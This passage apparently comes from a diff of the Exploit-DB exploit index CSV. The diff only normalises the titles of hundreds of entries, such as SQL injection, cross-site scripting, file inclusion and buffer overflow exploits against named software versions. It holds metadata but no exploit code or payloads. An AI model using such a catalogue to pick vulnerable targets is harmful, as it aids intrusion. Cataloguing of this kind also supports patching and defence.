Upload",2008-06-20,"AmnPardaz ",php,webapps,0 @@ -28807,7 +28808,7 @@ id,file,description,date,author,platform,type,port 31954,platforms/php/webapps/31954.txt,"Benja CMS 0.1 - /admin/admin_edit_submenu.php URL Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 31955,platforms/php/webapps/31955.txt,"Benja CMS 0.1 - /admin/admin_new_submenu.php URL Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 31956,platforms/php/webapps/31956.txt,"Benja CMS 0.1 - /admin/admin_edit_topmenu.php URL Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 -31957,platforms/multiple/dos/31957.txt,"World in Conflict 1.008 - NULL Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",multiple,dos,0 +31957,platforms/multiple/dos/31957.txt,"World in Conflict 1.008 - Null Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",multiple,dos,0 31958,platforms/multiple/dos/31958.txt,"SunAge 1.8.1 - Multiple Denial of Service Vulnerabilities",2008-06-23,"Luigi Auriemma",multiple,dos,0 31959,platforms/linux/local/31959.txt,"Perl - 'rmtree()' Function Local Insecure Permissions",2008-06-23,"Frans Pop",linux,local,0 31960,platforms/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 - Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 @@ -28841,7 +28842,7 @@ id,file,description,date,author,platform,type,port 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 31986,platforms/php/webapps/31986.txt,"WordPress VideoWhisper 4.27.3 Plugin - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY - gefebt.exe Remote Code Execution",2014-02-28,Metasploit,windows,remote,80 -31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - (Settings.ini) SEH Buffer Overflow (Metasploit)",2014-02-28,Metasploit,windows,local,0 +31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - (Settings.ini) Buffer Overflow (SEH) (Metasploit)",2014-02-28,Metasploit,windows,local,0 31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - (SalesInquiry.php SortBy Parameter) SQL Injection",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",multiple,webapps,0 31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Stack Buffer Overflow",2014-02-28,Provensec,windows,local,0 @@ -28892,13 +28893,13 @@ id,file,description,date,author,platform,type,port 32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injection",2014-03-03,LiquidWorm,php,webapps,0 32038,platforms/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent Cross-Site Scripting",2014-03-03,"Christian Catalano",php,webapps,0 32039,platforms/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps,0 -32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary Cross-Site Scripting File Upload",2014-03-03,"Christian Catalano",php,webapps,0 +32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary Cross-Site Scripting / File Upload",2014-03-03,"Christian Catalano",php,webapps,0 32041,platforms/windows/local/32041.pl,"ALLPlayer 5.8.1 - '.m3u' Buffer Overflow (SEH)",2014-03-03,"Gabor Seljan",windows,local,0 32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0 32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 - 'pid' Parameter SQL Injection",2008-08-21,"Hussin X",php,webapps,0 32284,platforms/php/webapps/32284.txt,"Simasy CMS - 'id' Parameter SQL Injection",2008-08-21,r45c4l,php,webapps,0 32049,platforms/windows/remote/32049.txt,"Microsoft Internet Explorer 6 - New ActiveX Object String Concatenation Memory Corruption",2008-07-14,0x000000,windows,remote,0 -32050,platforms/windows/local/32050.py,"Calavera UpLoader 3.5 - SEH Buffer Overflow",2014-03-04,"Daniel la calavera",windows,local,0 +32050,platforms/windows/local/32050.py,"Calavera UpLoader 3.5 - Buffer Overflow (SEH)",2014-03-04,"Daniel la calavera",windows,local,0 32051,platforms/php/webapps/32051.php,"Pubs Black Cat [The Fun] - 'browse.groups.php' SQL Injection",2008-07-14,RMx,php,webapps,0 32052,platforms/windows/remote/32052.html,"Sina DLoader Class - ActiveX Control 'DonwloadAndInstall' Method Arbitrary File Download",2008-07-14,Symantec,windows,remote,0 32053,platforms/php/webapps/32053.txt,"WordPress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,php,webapps,0 @@ -28923,7 +28924,7 @@ id,file,description,date,author,platform,type,port 32074,platforms/windows/local/32074.rb,"ALLPlayer - '.m3u' Buffer Overflow",2014-03-05,Metasploit,windows,local,0 32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent Cross-Site Scripting",2014-03-05,"High-Tech Bridge SA",php,webapps,80 -32077,platforms/php/webapps/32077.txt,"IBS 0.15 - 'username' Parameter Cross-Site Scripting",2008-07-17,Cyb3r-1sT,php,webapps,0 +32077,platforms/php/webapps/32077.txt,"IBS 0.15 - ''Username'' Parameter Cross-Site Scripting",2008-07-17,Cyb3r-1sT,php,webapps,0 32078,platforms/php/webapps/32078.php,"Community CMS 0.1 - 'include.php' Remote File Inclusion",2008-07-17,N3TR00T3R,php,webapps,0 32079,platforms/php/webapps/32079.txt,"CreaCMS - edition_article/edition_article.php cfg[document_uri] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 32080,platforms/php/webapps/32080.txt,"CreaCMS - fonctions/get_liste_langue.php cfg[base_uri_admin] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 @@ -28948,7 +28949,7 @@ id,file,description,date,author,platform,type,port 32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 32103,platforms/php/webapps/32103.txt,"VisualPic 0.3.1 - Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0 -32104,platforms/multiple/dos/32104.txt,"ZDaemon 1.8 - NULL Pointer Remote Denial of Service",2008-07-21,"Luigi Auriemma",multiple,dos,0 +32104,platforms/multiple/dos/32104.txt,"ZDaemon 1.8 - Null Pointer Remote Denial of Service",2008-07-21,"Luigi Auriemma",multiple,dos,0 32105,platforms/windows/dos/32105.pl,"PowerDVD 8.0 - '.m3u' / '.pls' Multiple Buffer Overflow Vulnerabilities",2008-07-22,LiquidWorm,windows,dos,0 32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - learnPath/calendar/myagenda.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 32107,platforms/php/webapps/32107.txt,"Claroline 1.8 - user/user.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 @@ -28957,7 +28958,7 @@ id,file,description,date,author,platform,type,port 32110,platforms/multiple/remote/32110.txt,"Outpost Security Suite Pro 2009 - Filename Parsing Security Bypass",2008-07-22,"Juan Pablo Lopez Yacubian",multiple,remote,0 32111,platforms/asp/webapps/32111.txt,"Pre Survey Generator - 'default.asp' SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 32112,platforms/linux/dos/32112.txt,"Minix 3.1.2a - Psuedo Terminal Denial of Service",2008-07-23,kokanin,linux,dos,0 -32113,platforms/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 - 'username' Parameter SQL Injection",2008-07-23,"Lars Heidelberg",php,webapps,0 +32113,platforms/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 - ''Username'' Parameter SQL Injection",2008-07-23,"Lars Heidelberg",php,webapps,0 32114,platforms/php/webapps/32114.txt,"AtomPhotoBlog 1.15 - 'atomPhotoBlog.php' SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 32115,platforms/php/webapps/32115.txt,"Ajax File Manager - Directory Traversal",2014-03-07,"Eduardo Alves",php,webapps,0 32116,platforms/php/webapps/32116.txt,"EZContents - 'minicalendar.php' Remote File Inclusion",2008-07-25,"HACKERS PAL",php,webapps,0 @@ -28969,13 +28970,13 @@ id,file,description,date,author,platform,type,port 32122,platforms/php/webapps/32122.txt,"Owl Intranet Engine 0.95 - 'register.php' Cross-Site Scripting",2008-07-28,"Fabian Fingerle",php,webapps,0 32123,platforms/php/webapps/32123.txt,"miniBB RSS 2.0 Plugin - Multiple Remote File Inclusion",2008-07-29,"Ghost Hacker",php,webapps,0 32124,platforms/windows/remote/32124.txt,"Eyeball MessengerSDK 'CoVideoWindow.ocx' 5.0.907 - ActiveX Control Remote Buffer Overflow",2008-07-29,"Edi Strosar",windows,remote,0 -32125,platforms/multiple/dos/32125.txt,"Unreal Tournament 2004 - NULL Pointer Remote Denial of Service",2008-07-30,"Luigi Auriemma",multiple,dos,0 +32125,platforms/multiple/dos/32125.txt,"Unreal Tournament 2004 - Null Pointer Remote Denial of Service",2008-07-30,"Luigi Auriemma",multiple,dos,0 32126,platforms/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection",2008-05-11,Portcullis,php,webapps,0 32127,platforms/multiple/dos/32127.txt,"Unreal Tournament 3 - Denial Of Service / Memory Corruption",2008-07-30,"Luigi Auriemma",multiple,dos,0 32128,platforms/php/webapps/32128.txt,"MJGUEST 6.8 - 'Guestbook.js.php' Cross-Site Scripting",2008-07-30,DSecRG,php,webapps,0 32129,platforms/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 - '.PLF' File Stack Buffer Overflow",2008-07-30,"fl0 fl0w",windows,remote,0 32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 - Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0 -32136,platforms/osx/dos/32136.html,"Apple Mac OS X 10.x - CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0 +32136,platforms/osx/dos/32136.html,"Apple Mac OSX 10.x - CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0 32137,platforms/multiple/remote/32137.txt,"Apache Tomcat 6.0.16 - 'RequestDispatcher' Information Disclosure",2008-08-01,"Stefano Di Paola",multiple,remote,0 32138,platforms/multiple/remote/32138.txt,"Apache Tomcat 6.0.16 - 'HttpServletResponse.sendError()' Cross-Site Scripting",2008-08-01,"Konstantin Kolinko",multiple,remote,0 32139,platforms/php/webapps/32139.txt,"freeForum 1.7 - 'acuparam' Parameter Cross-Site Scripting",2008-08-01,ahmadbady,php,webapps,0 @@ -29169,7 +29170,7 @@ id,file,description,date,author,platform,type,port 32347,platforms/php/webapps/32347.txt,"UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection",2008-09-02,"James Bercegay",php,webapps,0 32348,platforms/linux/dos/32348.txt,"MySQL 6.0.4 - Empty Binary String Literal Remote Denial Of Service",2008-03-28,"Kay Roepke",linux,dos,0 32349,platforms/php/webapps/32349.txt,"PunBB 1.2.x - 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-08-20,"Henry Sudhof",php,webapps,0 -32350,platforms/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 - mDNSResponder NULL Pointer Dereference Denial of Service",2008-09-09,"Mario Ballano Bárcena",windows,dos,0 +32350,platforms/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 - mDNSResponder Null Pointer Dereference Denial of Service",2008-09-09,"Mario Ballano Bárcena",windows,dos,0 32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0 32352,platforms/php/webapps/32352.txt,"AvailScript Job Portal Script - 'applynow.php' SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 32353,platforms/php/webapps/32353.txt,"Horde Application Framework 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps,0 @@ -29177,7 +29178,7 @@ id,file,description,date,author,platform,type,port 32355,platforms/php/webapps/32355.txt,"Hot Links SQL-PHP - 'news.php' SQL Injection",2008-09-10,r45c4l,php,webapps,0 32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0 32367,platforms/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command",2014-03-19,Metasploit,unix,remote,22 -32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - SEH Buffer Overflow",2014-03-19,"Ayman Sagy",windows,local,0 +32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - Buffer Overflow (SEH)",2014-03-19,"Ayman Sagy",windows,local,0 32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection (2)",2014-03-19,jsass,php,remote,0 32360,platforms/php/webapps/32360.txt,"Nooms 1.1 - smileys.php page_id Parameter Cross-Site Scripting",2008-09-11,Dr.Crash,php,webapps,0 32361,platforms/php/webapps/32361.txt,"Nooms 1.1 - search.php q Parameter Cross-Site Scripting",2008-09-11,Dr.Crash,php,webapps,0 @@ -29204,7 +29205,7 @@ id,file,description,date,author,platform,type,port 32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0 32422,platforms/php/webapps/32422.txt,"Vikingboard 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,php,webapps,0 32423,platforms/jsp/webapps/32423.txt,"OpenNms 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 -32424,platforms/jsp/webapps/32424.txt,"OpenNms 1.5.x - notification/list.jsp username Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 +32424,platforms/jsp/webapps/32424.txt,"OpenNms 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 32425,platforms/jsp/webapps/32425.txt,"OpenNms 1.5.x - event/list filter Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 32426,platforms/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 - Remote Stack Buffer Overflow",2008-09-26,"Ruben Santamarta ",windows,remote,0 32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 - 'LSTable.php' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 @@ -29230,7 +29231,7 @@ id,file,description,date,author,platform,type,port 32448,platforms/java/webapps/32448.txt,"Celoxis - Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,teuquooch1seero,java,webapps,0 32449,platforms/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 - 'actions.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,php,webapps,0 32450,platforms/php/webapps/32450.txt,"WikyBlog 1.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,"Omer Singer",php,webapps,0 -32451,platforms/linux/dos/32451.txt,"Linux Kernel (Fedora 8/9) - 'utrace_control' NULL Pointer Dereference Denial of Service",2008-10-02,"Michael Simms",linux,dos,0 +32451,platforms/linux/dos/32451.txt,"Linux Kernel (Fedora 8/9) - 'utrace_control' Null Pointer Dereference Denial of Service",2008-10-02,"Michael Simms",linux,dos,0 32452,platforms/linux/dos/32452.txt,"Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service",2008-10-02,"Matthew Dempsky",linux,dos,0 32453,platforms/php/webapps/32453.txt,"Dreamcost HostAdmin 3.1 - 'index.php' Cross-Site Scripting",2008-10-02,Am!r,php,webapps,0 32454,platforms/unix/dos/32454.xml,"libxml2 - Denial of Service",2008-10-02,"Christian Weiske",unix,dos,0 @@ -29258,7 +29259,7 @@ id,file,description,date,author,platform,type,port 32564,platforms/multiple/remote/32564.txt,"XWork 2.0.x - 'ParameterInterceptor' Class OGNL Security Bypass",2008-11-04,"Meder Kydyraliev",multiple,remote,0 32477,platforms/windows/dos/32477.py,"Microsoft Windows Media Player 11.0.5721.5230 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32478,platforms/windows/dos/32478.py,"jetVideo 8.1.1 - Basic '.wav' Local Crash (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 -32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary Upload",2014-03-24,"felipe andrian",php,webapps,0 +32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary File Upload",2014-03-24,"felipe andrian",php,webapps,0 32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - '.wav' Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 @@ -29285,11 +29286,11 @@ id,file,description,date,author,platform,type,port 32502,platforms/php/webapps/32502.txt,"Getsimple CMS 3.3.1 - Persistent Cross-Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0 32503,platforms/php/webapps/32503.txt,"Cart Engine 3.0.0 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 - (task.php) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 -32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 - Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 +32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 - (run Parameter) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 -32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 +32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 - (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - '.m3u' / '.pls' / '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 @@ -29360,7 +29361,7 @@ id,file,description,date,author,platform,type,port 32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router - Multiple Scripts Authentication Bypass Vulnerabilities",2008-11-12,"Craig Heffner",hardware,remote,0 32583,platforms/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0 32585,platforms/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,windows,local,0 -32586,platforms/windows/remote/32586.py,"Microsoft Active Directory LDAP Server - Username Enumeration",2008-11-14,"Bernardo Damele",windows,remote,0 +32586,platforms/windows/remote/32586.py,"Microsoft Active Directory LDAP Server - 'Username' Enumeration",2008-11-14,"Bernardo Damele",windows,remote,0 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0 32588,platforms/php/webapps/32588.txt,"BoutikOne CMS - 'search_query' Parameter Cross-Site Scripting",2008-11-17,d3v1l,php,webapps,0 32621,platforms/php/remote/32621.rb,"SePortal - SQL Injection / Remote Code Execution",2014-03-31,Metasploit,php,remote,80 @@ -29383,7 +29384,7 @@ id,file,description,date,author,platform,type,port 32605,platforms/php/webapps/32605.txt,"Venalsur Booking Centre 2.01 - Multiple Cross-Site Scripting Vulnerabilities",2008-11-29,Pouya_Server,php,webapps,0 32606,platforms/php/webapps/32606.txt,"Basic CMS - 'q' Parameter Cross-Site Scripting",2008-11-29,Pouya_Server,php,webapps,0 32607,platforms/php/webapps/32607.txt,"RakhiSoftware Shopping Cart - product.php Multiple Parameter Cross-Site Scripting",2008-11-28,"Charalambous Glafkos",php,webapps,0 -32608,platforms/php/webapps/32608.txt,"RakhiSoftware Shopping Cart - PHPSESSID Cookie manipulation Full Path Disclosure",2008-11-28,"Charalambous Glafkos",php,webapps,0 +32608,platforms/php/webapps/32608.txt,"RakhiSoftware Shopping Cart - PHPSESSID Cookie Manipulation Full Path Disclosure",2008-11-28,"Charalambous Glafkos",php,webapps,0 32609,platforms/asp/webapps/32609.txt,"Pre Classified Listings 1.0 - 'detailad.asp' SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 32610,platforms/asp/webapps/32610.txt,"Pre Classified Listings 1.0 - 'signup.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32611,platforms/asp/webapps/32611.txt,"CodeToad ASP Shopping Cart Script - Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 @@ -29393,7 +29394,7 @@ id,file,description,date,author,platform,type,port 32615,platforms/php/webapps/32615.txt,"Softbiz Classifieds Script - lostpassword.php msg Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 32616,platforms/php/webapps/32616.txt,"Softbiz Classifieds Script - admin/adminhome.php msg Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 32617,platforms/php/webapps/32617.txt,"Softbiz Classifieds Script - admin/index.php msg Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 -32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - Cross-Site Scripting / Remote Shell Exploit / Credentials Leak",2014-03-31,neglomaniac,php,remote,0 +32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak",2014-03-31,neglomaniac,php,remote,0 32619,platforms/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,52789 32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080 32622,platforms/php/webapps/32622.txt,"WordPress Ajax Pagination Plugin 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80 @@ -29478,9 +29479,9 @@ id,file,description,date,author,platform,type,port 32701,platforms/php/webapps/32701.txt,"WordPress XCloner Plugin 3.1.0 - Cross-Site Request Forgery",2014-04-04,"High-Tech Bridge SA",php,webapps,80 32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2 (build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80 32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Exploit",2014-04-05,Vulnerability-Lab,ios,webapps,0 -32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS)",2014-04-05,LiquidWorm,windows,dos,0 +32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service",2014-04-05,LiquidWorm,windows,dos,0 32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0 -32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption [Denial of Service]",2014-04-06,sajith,windows,dos,0 +32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption (Denial Of Service)",2014-04-06,sajith,windows,dos,0 32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter Cross-Site Scripting",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 - pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 - pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 @@ -29521,7 +29522,7 @@ id,file,description,date,author,platform,type,port 32751,platforms/linux/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",linux,local,0 32752,platforms/windows/local/32752.rb,"WinRAR - Filename Spoofing",2014-04-08,Metasploit,windows,local,0 32753,platforms/hardware/remote/32753.rb,"Fritz!Box Webcm - Unauthenticated Command Injection",2014-04-08,Metasploit,hardware,remote,0 -32754,platforms/osx/dos/32754.c,"Apple Mac OS X 10.9 - Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0 +32754,platforms/osx/dos/32754.c,"Apple Mac OSX 10.9 - Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0 32755,platforms/windows/dos/32755.c,"WFTPD Pro 3.30 - Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,windows,dos,0 32756,platforms/asp/webapps/32756.txt,"LDF - 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps,0 32757,platforms/php/webapps/32757.txt,"ConPresso CMS 4.07 - Multiple Remote Vulnerabilities",2009-01-26,"David Vieira-Kurz",php,webapps,0 @@ -29529,7 +29530,7 @@ id,file,description,date,author,platform,type,port 32759,platforms/php/webapps/32759.txt,"OpenX 2.6.2 - 'MAX_type' Parameter Local File Inclusion",2009-01-26,"Sarid Harper",php,webapps,0 32760,platforms/php/webapps/32760.txt,"NewsCMSLite - Insecure Cookie Authentication Bypass",2009-01-24,FarhadKey,php,webapps,0 32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial Of Service",2009-01-27,Lostmon,windows,dos,0 -32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager 7.1 - Username Enumeration",2009-01-27,"Marco Mella",multiple,remote,0 +32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager 7.1 - 'Username' Enumeration",2009-01-27,"Marco Mella",multiple,remote,0 32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443 32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0 32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek - 'cs.html' URI redirection",2009-01-28,buzzy,php,webapps,0 @@ -29550,7 +29551,7 @@ id,file,description,date,author,platform,type,port 32781,platforms/multiple/remote/32781.txt,"PyBlosxom 1.6.3 Atom Flavor - Multiple XML Injection Vulnerabilities",2009-02-09,"Nam Nguyen",multiple,remote,0 32782,platforms/php/webapps/32782.txt,"FotoWeb 6.0 - Login.fwx s Parameter Cross-Site Scripting",2009-02-09,"Stelios Tigkas",php,webapps,0 32783,platforms/php/webapps/32783.txt,"FotoWeb 6.0 - Grid.fwx search Parameter Cross-Site Scripting",2009-02-09,"Stelios Tigkas",php,webapps,0 -32784,platforms/php/webapps/32784.txt,"glFusion 1.1 - Anonymous Comment 'username' Field HTML Injection",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0 +32784,platforms/php/webapps/32784.txt,"glFusion 1.1 - Anonymous Comment ''Username'' Field HTML Injection",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0 32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0 33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router - Admin Password Cross-Site Request Forgery",2014-04-30,"shyamkumar somana",hardware,webapps,80 33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 @@ -29563,7 +29564,7 @@ id,file,description,date,author,platform,type,port 32795,platforms/novell/remote/32795.txt,"Novell QuickFinder Server - Multiple Cross-Site Scripting 